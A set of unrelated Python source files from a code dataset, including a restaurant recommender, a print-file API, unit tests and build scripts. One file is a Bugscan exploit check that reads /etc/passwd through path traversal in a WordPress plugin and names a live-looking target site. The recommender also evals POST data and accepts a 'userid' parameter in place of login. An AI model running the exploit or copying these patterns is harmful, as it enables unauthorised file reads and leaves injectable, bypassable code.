rec_name = 'cluster-scores_' + str(user) + '_' + purpose_str
memcache_scores = {}
memcache_scores['scores'] = scores
memcache_scores['purpose'] = purpose
if loc_filters is not None and 'lat' in loc_filters:
memcache_scores['lat'] = loc_filters['lat']
memcache_scores['lon'] = loc_filters['lon']
memcache_scores['max_dist'] = loc_filters['max_dist']
logging.info("CLUSTER SCORES saving in memcache ")# + str(memcache_scores))
client.set(rec_name, memcache_scores)
res = scores[0:np]
logging.info('kmeans.cluster_based END - res: ' + str(res))
return res
def recommend(user_id, filters, purpose='dinner with tourists', n=5):
"""
It computes the recommendations for the user, according to specified filters and parameters.
When possible, the recommendation list is personalized, using the cluster-based algorithm.
If the personalized algorithm fails to find the required number of recommended place, an average-based
non-personalized recommendation algorithm is used.
If still other places are needed, the recommendation list is filled with places ordered by distance from user.
Input:
- user_id: is of the requester
- filters: filters for places of interest for the user
- purpose: the purpose the user is interested in
- n: number of recommended places requested by the user
Available filters:
//- 'city': 'city!province!state!country'
The 'city' filter contains the full description of the city, with values separated with a '!'.
This string is split and used to retrieve only the places that are in the specified city.
'null' is used if part of the full city description is not available [example: 'Trento!TN!null!Italy'
or if a bigger reagion is considered [example: 'null!TN!null!Italy' retrieves all places in the province of Trento]
- 'lat', 'lon' and 'max_dist': lat and lon indicates the user position, while max_dist is a measure expressed in meters
and represnt the radius of the circular region the user is interested in.
Returns a list of n places in json format
"""
logging.info("recommender.recommend START - user_id=" + str(user_id) +
', filters=' + str(filters) + ', purpose=' + str(purpose) + ', n=' + str(n))
# places is already a json list
start = datetime.now()
user_max_dist = None
if filters is not None and 'max_dist' in filters and filters['max_dist'] is not None and filters['max_dist'] > 0:
user_max_dist = filters['max_dist']
#get places for a larger area
filters['max_dist'] = 2 * user_max_dist
places, status, errcode = logic.place_list_get(filters, user_id)
logging.info("RECOMMEND places loaded ")
if status != "OK" or places is None or len(places) < 1:
# the system do not know any place within these filters
logging.info("recommender.recommend END - no places")
logging.error(str(errcode) + ": " + status)
return None
logging.warning("Loaded places for double distance: " + str(datetime.now() - start))
start = datetime.now()
closest = []
out_distance = []
for p in places:
if 'lat' in filters and 'lon' in filters and filters['lat'] is not None and filters['lon'] is not None:
# add distance to user for each place
p['distance'] = distance(
p['address']['lat'], p['address']['lon'], filters['lat'], filters['lon'])
if p['distance'] is not None and user_max_dist is not None and p['distance'] <= user_max_dist:
closest.append(p)
else:
out_distance.append(p)
if len(closest) >= n:
places = closest
elif len(closest) == 0:
places = out_distance
else:
#TODO: fill missing spaces with outliers?
places = closest
logging.warning("removing places that are too far: " + str(datetime.now() - start))
place_ids = []
if places is not None:
place_ids = [Place.make_key(None, place['key']).id() for place in places]
scores = None
purpose_list = ["dinner with tourists", "romantic dinner", "dinner with friends", "best price/quality ratio"]
start = datetime.now()
# logging.warning("RECOMMEND START get cluster-based predictions for all purposes: " + str(start))
for p in purpose_list:
if p == purpose:
start2 = datetime.now()
scores = cluster_based(user_id, place_ids, p, n, loc_filters=filters)
logging.warning("RECOMMEND END get cluster-based predictions: " + str(datetime.now()-start2))
else:
q = taskqueue.Queue('recommendations')
task = taskqueue.Task(params={'user_id': user_id, 'place_ids': place_ids, 'purpose': p, 'n': n, 'loc_filters': str(filters)},
url='/recommender/compute_cluster_based', method='POST', countdown=10)
q.add(task)
logging.warning("Getting recommendations from cluster and starting computation for other purposes: " + str(datetime.now() - start))
log_text = "RECOMMEND scores from cluster-based : "
if scores is None:
log_text += "None"
else:
log_text += str(len(scores))
logging.info(log_text)
start = datetime.now()
if scores is None or (len(scores) < n and len(scores) < len(places)):
# cluster-based recommendation failed
# non-personalized recommendation
rating_filters = {}
if places is not None:
rating_filters['places'] = place_ids
rating_filters['purpose'] = purpose
ratings = load_data(rating_filters)
if ratings is None:
logging.info("ratings for places: None")
else:
logging.info("ratings for places: " + str(len(ratings)))
items = {}
if ratings is not None:
for other in ratings:
if other != user_id:
for item in ratings[other]:
if purpose in ratings[other][item]:
if item not in items.keys():
items[item] = []
items[item].append(ratings[other][item][purpose])
avg_scores = [(sum(items[item]) / len(items[item]), item)
for item in items]
logging.info("avg_scores: " + str(len(avg_scores)))
filters = {'purpose': purpose, 'user': user_id}
if places is not None:
filters['places'] = place_ids
user_ratings = Rating.get_list(filters)
logging.info("Loaded user ratings: " + str(len(user_ratings)))
if scores is None:
scores = []
for value, key in avg_scores:
toadd = True
for ur in user_ratings:
if value < 3.0:
#skip this place, too low rating
toadd = False
continue
if key == ur.place.urlsafe() and ur.value < 3.0:
#skip this place, user doesn't like it
toadd = False
continue
for svalue, skey in scores:
if key == skey:
#already in list because of cluster
toadd = False
break
if toadd:
scores.append((value, key))
logging.info("Appending place with value " + str(value))
if len(scores) >= n:
# we have enough recommended places
break
scores = sorted(scores, key=lambda x: x[0], reverse = True)
if len(scores) > n:
scores = scores[0:n]
# if debug:
# log_text = "RECOMMEND scores from average-based : "
# if scores is None:
# log_text += "None"
# else:
# log_text += str(len(scores))
# logging.info(log_text)
#
# if scores is None or (len(scores) < n and len(scores) < len(places)):
# # cluster-based and average recommendations both failed to fill the recommendation list
# # just add some other places
# for p in places:
# in_list = False
# for score, key in scores:
# if key == p['key']:
# in_list = True
# break
# if not in_list:
# scores.append((0, p['key']))
# if len(scores) >= n:
# # we have enough recommended places
# break
#
# if debug:
# log_text = "RECOMMEND final scores : "
# if scores is None:
# log_text += "None"
# else:
# log_text += str(len(scores))
# logging.info(log_text)
logging.warning("Filling empty space with full average predictions: " + str(datetime.now() - start))
start = datetime.now()
places_scores = []
for p in places:
# found = False
for (score, item) in scores:
if item == p['key']:
places_scores.append((score, p))
# found = True
# if not found:
# places_scores.append((0, p))
logging.info('places_scores: ' + str(len(places_scores)))
places_scores = sorted(places_scores, key=lambda x: x[0], reverse = True)
logging.warning("Moving mapping from place ids to full place data: " + str(datetime.now() - start))
if len(places_scores) > n:
places_scores = places_scores[0:n]
# logging.info('recommender.recommend - places_scores: ' + str(places_scores))
items = []
start = datetime.now()
for (score, place) in places_scores:
#TODO: make discount loading asynchronous in javascript page, after visualization of places!!!
disc_filters = {'place': place['key'], 'published': 'True', 'passed': 'False'}
discounts, status, errcode = logic.discount_list_get(disc_filters, user_id)
logging.info("discounts loaded: " + str(errcode) + " - " + status)
if discounts is not None and status == "OK":
try:
json_discounts = [Discount.to_json(d, None, None) for d in discounts]
place['discounts'] = json_discounts
except (TypeError, ValueError) as e:
#do nothing
logging.error('Discounts not loaded: ' + str(e))
pass
place['predicted'] = score
items.append(place)
logging.warning("Time for loading discounts: " + str(datetime.now() - start))
# logging.info("Recommended items: " + str(items))
logging.info("recommender.recommend END ")#- items: " + str(items))
return items
class KmeansRecommendHandler(webapp2.RequestHandler):
def get(self):
auth = self.request.headers.get("Authorization")
if auth is None or len(auth) < 1:
auth = self.request.cookies.get("user")
user_id = logic.get_current_userid(auth)
if user_id is None:
#only for test purposes!!
user_id = self.request.GET.get('userid')
if user_id is None:
self.response.set_status(403)
self.response.write("You must login first!")
return
logging.info('Recommender: ' + str(self.request.GET))
# user = logic.user_get(user_id, None)
# get parameters from GET data
#max_dist is measured in meters
filters = {
'lat': float(self.request.GET.get('lat')),
'lon': float(self.request.GET.get('lon')),
'max_dist': float(self.request.GET.get('max_dist'))
}
purpose = self.request.GET.get('purpose')
num = int(self.request.GET.get('n'))
start= datetime.now()
places = recommend(user_id, filters, purpose=purpose, n=num)
logging.warning("Total time for recommendations: " + str(datetime.now() - start))
if places is None or len(places) == 0:
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps([]))
return
json_list = places
# logging.info(str(json_list))
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(json_list))
class ComputeClusterBasedHandler(webapp2.RequestHandler):
def post(self):
if 'X-AppEngine-QueueName' not in self.request.headers:
logging.info('recommender.RecomputeClustersHandler.get END called not from queue - 403')
# the request is not coming from a queue!!
self.response.set_status(403)
self.response.write("You cannot access this method!!!")
return
logging.info("ComputeClusterBasedHandler")
post_data = self.request.params
logging.info("POST data: " + str(post_data))
place_ids = post_data.getall('place_ids')
place_ids = [long(pid) for pid in place_ids]
filters = eval(post_data.get('loc_filters'))
n = int(post_data.get('n'))
user_id = post_data.get('user_id')
purpose = post_data.get('purpose')
# logging.error("place keys: " + str(place_ids))
# logging.error("loc_filtes: " + str(filters))
# logging.error("n: " + str(n))
# logging.error("user: " + str(user_id))
# logging.error("purpose: " + str(purpose))
cluster_based(user_id, place_ids, purpose, n, loc_filters=filters)
logging.info("ComputeClusterBasedHandler END")
class ManualComputeHandler(webapp2.RequestHandler):
def get(self):
q = taskqueue.Queue('update-clusters-queue')
task = taskqueue.Task(
url='/kmeans/compute_clusters', method='GET', countdown=0, target='cluster')
q.add(task)
app = webapp2.WSGIApplication([
('/recommender/', KmeansRecommendHandler),
('/recommender/compute_cluster_based', ComputeClusterBasedHandler),
('/recommender/compute_clusters_manual', ManualComputeHandler),
], debug=True)
| StarcoderdataPython |
4801690 | ###############################################################################
# Copyright (c) 2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory
# Written by <NAME>, <EMAIL>.
#
# LLNL-CODE-734340
# All rights reserved.
# This file is part of MaestroWF, Version: 1.0.0.
#
# For details, see https://github.com/LLNL/maestrowf.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
"""Collection of custom adapters for interfacing with various systems."""
import logging
import pkgutil
import inspect
from maestrowf.abstracts.interfaces import ScriptAdapter
__all__ = ("ScriptAdapterFactory",)
LOGGER = logging.getLogger(__name__)
def iter_adapters():
"""
Based off of packaging.python.org loop over a namespace and find the
modules. This has been adapted for this particular use case of loading
all classes implementing ScriptAdapter loaded from all modules in
maestrowf.interfaces.script.
:return: an iterable of the classes existing in the namespace
"""
# get loader for the script adapter package
loader = pkgutil.get_loader('maestrowf.interfaces.script')
# get all of the modules in the package
mods = [(name, ispkg) for finder, name, ispkg in pkgutil.iter_modules(
loader.load_module('maestrowf.interfaces.script').__path__,
loader.load_module('maestrowf.interfaces.script').__name__ + ".")]
cs = []
for name, _ in mods:
# get loader for every module
m = pkgutil.get_loader(name).load_module(name)
# get all classes that implement ScriptAdapter and are not abstract
for n, cls in m.__dict__.items():
if isinstance(cls, type) and issubclass(cls, ScriptAdapter) and \
not inspect.isabstract(cls):
cs.append(cls)
return cs
class ScriptAdapterFactory(object):
factories = {
adapter.key: adapter for adapter in iter_adapters()
}
@classmethod
def get_adapter(cls, adapter_id):
if adapter_id.lower() not in cls.factories:
msg = "Adapter '{0}' not found. Specify an adapter that exists " \
"or implement a new one mapping to the '{0}'" \
.format(str(adapter_id))
LOGGER.error(msg)
raise Exception(msg)
return cls.factories[adapter_id]
@classmethod
def get_valid_adapters(cls):
return cls.factories.keys()
| StarcoderdataPython |
1792310 | <reponame>frenzylabs/ancilla<filename>ancilla/ancilla/foundation/node/api/file.py
'''
file.py
ancilla
Created by <NAME> (<EMAIL>) on 01/08/20
Copyright 2019 FrenzyLabs, LLC.
'''
import time
import os, random, string
import asyncio
import math
from .api import Api
from ..events import FileEvent
from ...data.models import PrintSlice
from ..response import AncillaResponse, AncillaError
class FileApi(Api):
# def __init__(self, service):
# super().__init__(service)
# self.setup_api()
def setup(self):
super().setup()
self.service.route('/<file_id>', 'GET', self.get)
self.service.route('/<file_id>/unsync', 'PATCH', self.unsync_layerkeep)
self.service.route('/<file_id>', 'PATCH', self.update)
self.service.route('/<file_id>/sync_layerkeep', 'POST', self.sync_to_layerkeep)
self.service.route('/sync_layerkeep', 'POST', self.sync_from_layerkeep)
self.service.route('/', 'GET', self.list_files)
self.service.route('/', 'POST', self.post)
self.service.route('/<file_id>', 'DELETE', self.delete)
# self.service.route('/', 'DELETE', self.delete)
def unsync_layerkeep(self, request, layerkeep, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
print_slice.layerkeep_id = None
print_slice.save()
return {"file": print_slice.json}
# pass
async def update(self, request, layerkeep, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
name = request.params.get("name")
description = request.params.get("description")
if name:
print_slice.name = name
if description:
print_slice.description = description
lksync = request.params.get("layerkeep_sync")
if lksync and lksync != 'false':
if print_slice.layerkeep_id:
response = await layerkeep.update_sliced_file({"data": print_slice.json})
if not response.success:
raise response
else:
response = await layerkeep.upload_sliced_file({"data": {"sliced_file": print_slice.json, "params": request.params}})
if not response.success:
raise response
print_slice.layerkeep_id = response.body.get("data").get("id")
else:
print_slice.layerkeep_id = None
print_slice.save()
return {"file": print_slice.json}
async def post(self, request, layerkeep, *args):
# print(request.files, flush=True)
name = request.params.get("name") or ""
rootname, ext = os.path.splitext(name)
description = request.params.get("description") or ""
incoming = request.files.get('file', [])
if len(incoming) > 0:
incoming = incoming[0]
else:
raise AncillaError(400, {"error": "No File"})
# incoming = request.files['file'][0]
generated_name = rootname + "".join(random.choice(string.ascii_lowercase + string.digits) for x in range(6))
original_name = incoming.get('filename') or incoming.get('name') or f"{generated_name}.txt"
root, ext = os.path.splitext(original_name)
if name == "":
name = original_name
filename = generated_name + ext
filepath = self._path_for_file(filename)
output = open(filepath, 'wb')
output.write(incoming['body'])
output.close()
print_slice = PrintSlice(name=name, generated_name=filename, path=filepath, description=description)
lksync = request.params.get("layerkeep_sync")
if lksync and lksync != 'false':
response = await layerkeep.upload_sliced_file({"data": {"sliced_file": print_slice.json, "params": request.params}})
if not response.success:
raise response
print_slice.layerkeep_id = response.body.get("data").get("id")
print_slice.save()
self.service.fire_event(FileEvent.created, print_slice.json)
return {"file": print_slice.json}
def list_files(self, request, *args):
page = int(request.params.get("page") or 1)
per_page = int(request.params.get("per_page") or 5)
q = PrintSlice.select().order_by(PrintSlice.created_at.desc())
if request.params.get("q[name]"):
q = q.where(PrintSlice.name.contains(request.params.get("q[name]")))
cnt = q.count()
num_pages = math.ceil(cnt / per_page)
return {"data": [p.to_json(recurse=True) for p in q.paginate(page, per_page)], "meta": {"current_page": page, "last_page": num_pages, "total": cnt}}
def get(self, request, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
if request.params.get('download'):
request.response.set_header('Content-Type', 'application/force-download')
request.response.set_header('Content-Disposition', 'attachment; filename=%s' % print_slice.name)
return {"file": print_slice.json}
async def delete(self, request, layerkeep, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
if print_slice.layerkeep_id:
if request.params.get("delete_remote"):
resp = await layerkeep.delete_sliced_file({"data": {"layerkeep_id": print_slice.layerkeep_id}})
if self.service.delete_file(print_slice):
return {"status": 200}
else:
raise AncillaError(400, {"error": f"Could Not Delete File {print_slice.name}"})
def _path_for_file(self, filename):
return "{}/{}".format(self.service.root_path, filename)
def connect(self, *args):
return self.service.connect()
def disconnect(self, *args):
if self.service.connector:
self.service.stop()
return {"status": "disconnected"}
async def sync_from_layerkeep(self, request, layerkeep, *args):
layerkeep_id = request.params.get("attributes").get("id")
localsf = PrintSlice.select().where(PrintSlice.layerkeep_id == layerkeep_id).first()
if localsf:
return {"file": localsf.json}
name = request.params.get("attributes").get("name")
description = request.params.get("attributes").get("description") or ""
response = await layerkeep.download_sliced_file({"data": request.params})
if not response.success:
raise response
filename = "".join(random.choice(string.ascii_lowercase + string.digits) for x in range(6))
ext = os.path.splitext(name)[1]
filename = filename + ext
filepath = self._path_for_file(filename)
output = open(filepath, 'wb')
output.write(response.body)
output.close()
sf = PrintSlice(name=name, generated_name=filename, path=filepath, layerkeep_id=request.params.get("id"), description=description, source="layerkeep")
sf.save()
self.service.fire_event(FileEvent.created, sf.json)
return {"file": sf.json}
async def sync_to_layerkeep(self, request, layerkeep, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
if print_slice.layerkeep_id:
return {"data": print_slice.json}
response = await layerkeep.upload_sliced_file({"data": {"sliced_file": print_slice.json, "params": request.params}})
if not response.success:
raise response
print_slice.layerkeep_id = response.body.get("data").get("id")
print_slice.save()
return {"file": print_slice.json}
| StarcoderdataPython |
189660 | import unittest
import file01 as file
class TestBasicCalculation(unittest.TestCase):
def test_check_key(self):
self.assertEqual(file.check_key(-1), False)
self.assertEqual(file.check_key(0), True)
self.assertEqual(file.check_key(1), True)
self.assertEqual(file.check_key(50), True)
self.assertEqual(file.check_key(94), True)
self.assertEqual(file.check_key(95), False)
self.assertEqual(file.check_key('a'), False)
def test_check_upper_lower(self):
self.assertEqual(file.check_upper_lower("The quick Brown Fox!"), [3, 13])
self.assertEqual(file.check_upper_lower("Khoor#Zruog#=,"), [2, 8])
self.assertEqual(file.check_upper_lower("012345"), [0, 0])
def test_encrypt_decrypt_string(self):
self.assertEqual(file.encrypt_decrypt_string("Hello World :)"), "Khoor#Zruog#=,")
self.assertEqual(file.encrypt_decrypt_string("Khoor#Zruog#=,", 3, 2), "Hello World :)")
self.assertEqual(file.encrypt_decrypt_string("Khoor#Zruog#=,", option=2), "Hello World :)")
self.assertEqual(file.encrypt_decrypt_string("Hello World :)", key=100), "Invalid key!")
self.assertEqual(file.encrypt_decrypt_string("Hello World :)", option=4), "Invalid option!")
def test_count_words_in_file(self):
self.assertEqual(file.count_words_in_file("test1.txt"), {'HELLO': 1, 'WORLD': 2, 'HOW': 1, 'ARE': 1, 'YOU': 1, 'DOING': 1, 'I': 1, 'LOVE': 1, 'THIS': 1})
self.assertEqual(file.count_words_in_file("test2.txt"), {'TEST': 3, 'ONE': 2, 'TWO': 1, 'THREE': 1})
self.assertEqual(file.count_words_in_file("test3.txt"), "Wrong file or file path")
def test_summarise_data(self):
self.assertEqual(file.summarise_data("traffic_data.txt", 0), [13096, 6493, 471876, 50, 9437.52])
self.assertEqual(file.summarise_data("traffic_data.txt", 1), [11799, 5778, 421298, 50, 8425.96])
self.assertEqual(file.summarise_data("population_10.txt", 5), [1371851, 1730, 3327840, 34, 97877.65])
self.assertEqual(file.summarise_data("population_10.txt", 6), [1425791, 1878, 4274491, 38, 112486.61])
self.assertRaises(FileNotFoundError, file.summarise_data, "filenotexist.txt", 0)
if __name__== "__main__":
unittest.main() | StarcoderdataPython |
3376932 | <filename>Bugscan_exploits-master/exp_list/exp-1639.py
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#__Author__ = zhiyuan
#___Sertype___ = WordPress wp-miniaudioplayer任意文件下载漏洞
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
payload = 'wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd'
url = arg + payload
code, head, body, errcode, _url = curl.curl2(url)
if code == 200 and '/root:/bin/bash' in body:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://baiemusic.fr/')[1]) | StarcoderdataPython |
1792182 | import sys
import os, os.path
import shutil
if sys.version_info < (3,):
range = xrange
def CheckParameter():
outputPath = None
searchStartDir = None
isIncludeFolder = None
excludePaths = None
count = len(sys.argv)-1
if count >= 8:
for i in range(1, count):
if sys.argv[i] == "-OutputPath":
outputPath = os.path.abspath(sys.argv[i+1])
elif sys.argv[i] == "-SearchStartDir":
searchStartDir = os.path.abspath(sys.argv[i+1])
elif sys.argv[i] == "-IsIncludeFolder":
isIncludeFolder = sys.argv[i+1]
elif sys.argv[i] == "-ExcludePaths":
excludePaths = sys.argv[i+1]
else:
i-=1
i+=1
if isIncludeFolder == "True":
isIncludeFolder = True
elif isIncludeFolder == "False":
isIncludeFolder = False
if excludePaths is not None:
excludePaths = excludePaths.split(',')
if len(excludePaths) == 1 and excludePaths[0].lower() is 'null':
excludePaths = None
else:
for i in list(range(0, len(excludePaths))):
excludePaths[i] = os.path.abspath(excludePaths[i])
result = (outputPath is not None) and (searchStartDir is not None) and (isIncludeFolder is not None)
return result, outputPath, searchStartDir, isIncludeFolder, excludePaths
def Dump():
print ("Paramater Error!!\n")
print ("-OutputPath \'outputpath\' -SearchStartDir \'searchstartDir\' -IsIncludeFolder \'True or False\' -ExcludePaths excludepath\n")
print ('Example 1 :')
print ("-OutputPath ../../Output -SearchStartDir ./Engine -IsIncludeFolder False -ExcludePaths ./Engine/ShaderCodes,./Engine/Scripts \n")
return
CONSOLE_LINE = "***********************************************"
print (CONSOLE_LINE + '\n')
print ("SOC Framework HeaderOrganizer\n")
result, outputPath, searchStartDir, isIncludeFolder, excludePaths = CheckParameter()
if result == False:
Dump()
print (CONSOLE_LINE)
exit()
headerFormat = ['.h', '.hpp', '.inl']
def MakeDirectoryPiramid(path):
folders = path.split('\\')
folders.reverse()
for i in list(range(1, len(folders))):
invIdx = len(folders) - i
folders[invIdx - 1] = folders[invIdx] + '\\' + folders[invIdx - 1]
folders.reverse()
return folders
# Clear Output Header Folder
if os.path.exists(outputPath):
shutil.rmtree(outputPath, ignore_errors=True)
os.makedirs(outputPath)
targetDir = os.path.normpath(searchStartDir)
for (path, dirs, files) in os.walk(targetDir):
for fileNameWithExtension in files:
if path in excludePaths:
continue
fileExtension = fileNameWithExtension[fileNameWithExtension.rfind('.'):]
if not (fileExtension.lower() in headerFormat):
continue
fileFullPath = path + "\\" + fileNameWithExtension
saveFilePath = ""
if isIncludeFolder:
relativePath = path[len(searchStartDir)+1:]
saveFolderPath = outputPath + '\\' + relativePath
saveFilePath = saveFolderPath + '\\' + fileNameWithExtension
# print saveFolderPath
folders = MakeDirectoryPiramid(saveFolderPath)
for folderPath in folders:
if not os.path.exists(folderPath):
os.makedirs(folderPath)
shutil.copy(fileFullPath, saveFilePath)
else:
saveFilePath = outputPath + '\\' + fileNameWithExtension
shutil.copy(fileFullPath, saveFilePath)
print (fileFullPath + " -> " + saveFilePath)
print ("\nDone!\n")
print (CONSOLE_LINE) | StarcoderdataPython |
1793470 | <filename>apps/questions_app/api/views.py<gh_stars>0
from rest_framework import generics
from apps.questions_app.api.serializers import (QuestionSerializer)
from apps.questions_app.models import Question
import random
class QuestionsListAPIView(generics.ListAPIView):
"""this endpoint randomly returns a list of 10 questions"""
serializer_class = QuestionSerializer
def get_queryset(self):
pool = list(Question.objects.all())
random.shuffle(pool)
object_list = pool[:3]
return object_list
| StarcoderdataPython |
37372 | #!/usr/bin/python3
'''
BubbleSort.py
by <NAME>
'''
array = []
print("Enter at least two numbers to start bubble-sorting.")
print("(You can end inputing anytime by entering nonnumeric)")
# get numbers
while True:
try:
array.append(float(input(">> ")))
except ValueError: # exit inputing
break
print("\nThe array you've entered was:"); print(array)
print("\nNow sorting...")
# sorting
for x in range(len(array)-1, 0, -1):
for y in range(x):
if array[y] > array[y+1]:
array[y], array[y+1] = array[y+1], array[y]
print(array)
# output
print("\nAll done! Now the moment of truth!")
print(array)
| StarcoderdataPython |
31734 |
# IMAGES #
# UI NAVIGATION #
img_addFriend = "add_friend.png"
img_allow = "allow.png"
img_allowFlash = "enableflash_0.png"
img_allowFlash1 = "enableflash_1.png"
img_allowFlash2 = "enableflash_2.png"
img_alreadyStarted = "alreadystarted.png"
img_alreadyStarted1 = "alreadystarted1.png"
img_backButton = "back_button.png"
img_beginningGame = "beginninggame.png"
img_challengeFriend = "challenge_friend.png"
img_cheapButtonFriend = "cheap_button_friend.png"
img_cheapButton = "cheap_button.png"
img_cueUpdate = "cueUpdate.png"
img_cues = "cues.png"
img_collectCoins = "collectcoins.png"
img_collectCoins1 = "collectcoins_1.png"
img_defaultAcct = "defaultaccount.png"
img_eightBallSpinButton = "8ballspin_button.png"
img_emailArea = "email_area.png"
img_facebookLogo = "facebooklogo.png"
img_inviteFriend = "invite_friend.png"
img_isGameStart = "isgamestart.png"
img_loginButton3 = "login3_button.png"
img_loginWithMiniclip = "login_with_miniclip.png"
img_luckyShot = "luckyShot.png"
img_mainMenuBefore = "mainmenu_before.png"
img_passwordArea = "password_<PASSWORD>"
img_playButtonGuest = "play_button_guest.png"
img_playButtonLogged = "play_button_logged.png"
img_playFree = "playFree.png"
img_playFriends = "playfriends.png"
img_playNow = "playnow.png"
img_poolChoice = "poolchoice.png"
img_poolChoice1 = "poolchoice1.png"
img_poolChoice200 = "poolchoice200.png"
img_poolChoice200_1 = "poolchoice200_1.png"
img_searchFriends = "search_friends.png"
img_searchFriends1 = "search_friends2.png"
img_searchFriends2 = "search_friends3.png"
img_signUpLogin = "signup_login_button.png"
img_spinWinCollect = "spinwin_collect.png"
img_spinWinIcon = "spinwinicon.png"
img_spinWinX = "spinwin_x.png"
img_topRightCorner = "top_right_corner.png"
img_topRightCornerLogged = "top_right_corner_logged.png"
img_turn = "turn.png"
img_turn1 = "turn1.png"
img_opponentTurn = "playertwoturn.png"
img_opponentTurn1 = "playertwoturn1.png"
img_url = "url.png"
img_url2 = "url2.png"
img_url3 = "url3.png"
img_urlBar = "urlbar.png"
img_unsecure = "unsecure.png"
img_xOut = "xout.png"
# UI NAVIGATION #
# GAME NAVIGATION #
img_1ball = "1ball.png"
img_2ball = "2ball.png"
img_3ball = "3ball.png"
img_4ball = "4ball.png"
img_5ball = "5ball.png"
img_6ball = "6ball.png"
img_7ball = "7ball.png"
img_8ball = "8ball.png"
img_9ball = "9ball.png"
img_10ball = "10ball.png"
img_11ball = "11ball.png"
img_12ball = "12ball.png"
img_13ball = "13ball.png"
img_14ball = "14ball.png"
img_15ball = "15ball.png"
img_1ballDark = "1ballDark.png"
img_2ballDark = "2ballDark.png"
img_3ballDark = "3ballDark.png"
img_4ballDark = "4ballDark.png"
img_5ballDark = "5ballDark.png"
img_6ballDark = "6ballDark.png"
img_7ballDark = "7ballDark.png"
img_8ballDark = "8ballDark.png"
img_9ballDark = "9ballDark.png"
img_10ballDark = "10ballDark.png"
img_11ballDark = "11ballDark.png"
img_12ballDark = "12ballDark.png"
img_13ballDark = "13ballDark.png"
img_14ballDark = "14ballDark.png"
img_15ballDark = "15ballDark.png"
img_cueball = "cueball.png"
img_eightball = "eightball.png"
img_ballPic1 = "ballpic1.png"
img_tlh = "tlh.png"
img_tmh = "tmh.png"
img_trh = "trh.png"
img_blh = "blh.png"
img_bmh = "bmh.png"
img_brh = "brh.png"
img_topRail = "toprail.png"
img_bottomRail = "bottomrail.png"
img_leftRail = "leftrail.png"
img_rightRail = "rightrail.png"
# GAME NAVIGATION #
# IMAGES #
debug = False | StarcoderdataPython |
22808 | import os
import sys
import shutil
import glob
import time
import multiprocessing as mp
if len(sys.argv)!=4:
print("Usage: ")
print("python extract_features_WORLD.py <path_to_wav_dir> <path_to_feat_dir> <sampling rate>")
sys.exit(1)
# top currently directory
current_dir = os.getcwd()
# input audio directory
wav_dir = sys.argv[1]
# Output features directory
out_dir = sys.argv[2]
# initializations
fs = int(sys.argv[3])
# tools directory
world = os.path.join(current_dir, "tools/bin/WORLD")
sptk = os.path.join(current_dir, "tools/bin/SPTK-3.11")
if not os.path.exists(out_dir):
os.mkdir(out_dir)
if fs == 16000:
nFFTHalf = 1024
alpha = 0.58
elif fs == 22050:
nFFTHalf = 1024
alpha = 0.65
elif fs == 44100:
nFFTHalf = 2048
alpha = 0.76
elif fs == 48000:
nFFTHalf = 2048
alpha = 0.77
else:
print("As of now, we don't support %d Hz sampling rate." %(fs))
print("Please consider either downsampling to 16000 Hz or upsampling to 48000 Hz")
sys.exit(1)
#bap order depends on sampling rate.
mcsize=59
def get_wav_filelist(wav_dir):
wav_files = []
for file in os.listdir(wav_dir):
whole_filepath = os.path.join(wav_dir,file)
if os.path.isfile(whole_filepath) and str(whole_filepath).endswith(".wav"):
wav_files.append(whole_filepath)
elif os.path.isdir(whole_filepath):
wav_files += get_wav_filelist(whole_filepath)
wav_files.sort()
return wav_files
def process(filename):
'''
The function decomposes a wav file into F0, mel-cepstral coefficients, and aperiodicity
:param filename: path to wav file
:return: .lf0, .mgc and .bap files
'''
file_id = os.path.basename(filename).split(".")[0]
print('\n' + file_id)
### WORLD ANALYSIS -- extract vocoder parameters ###
### extract f0, sp, ap ###
world_analysis_cmd = "%s %s %s %s %s" % (os.path.join(world, 'analysis'), \
filename,
os.path.join(out_dir, file_id + '.f0'), \
os.path.join(out_dir, file_id + '.sp'), \
os.path.join(out_dir, file_id + '.bapd'))
os.system(world_analysis_cmd)
### convert f0 to lf0 ###
sptk_x2x_da_cmd = "%s +da %s > %s" % (os.path.join(sptk, 'x2x'), \
os.path.join(out_dir, file_id + '.f0'), \
os.path.join(out_dir, file_id + '.f0a'))
os.system(sptk_x2x_da_cmd)
sptk_x2x_af_cmd = "%s +af %s | %s > %s " % (os.path.join(sptk, 'x2x'), \
os.path.join(out_dir, file_id + '.f0a'), \
os.path.join(sptk, 'sopr') + ' -magic 0.0 -LN -MAGIC -1.0E+10', \
os.path.join(out_dir, file_id + '.lf0'))
os.system(sptk_x2x_af_cmd)
### convert sp to mgc ###
sptk_x2x_df_cmd1 = "%s +df %s | %s | %s >%s" % (os.path.join(sptk, 'x2x'), \
os.path.join(out_dir, file_id + '.sp'), \
os.path.join(sptk, 'sopr') + ' -R -m 32768.0', \
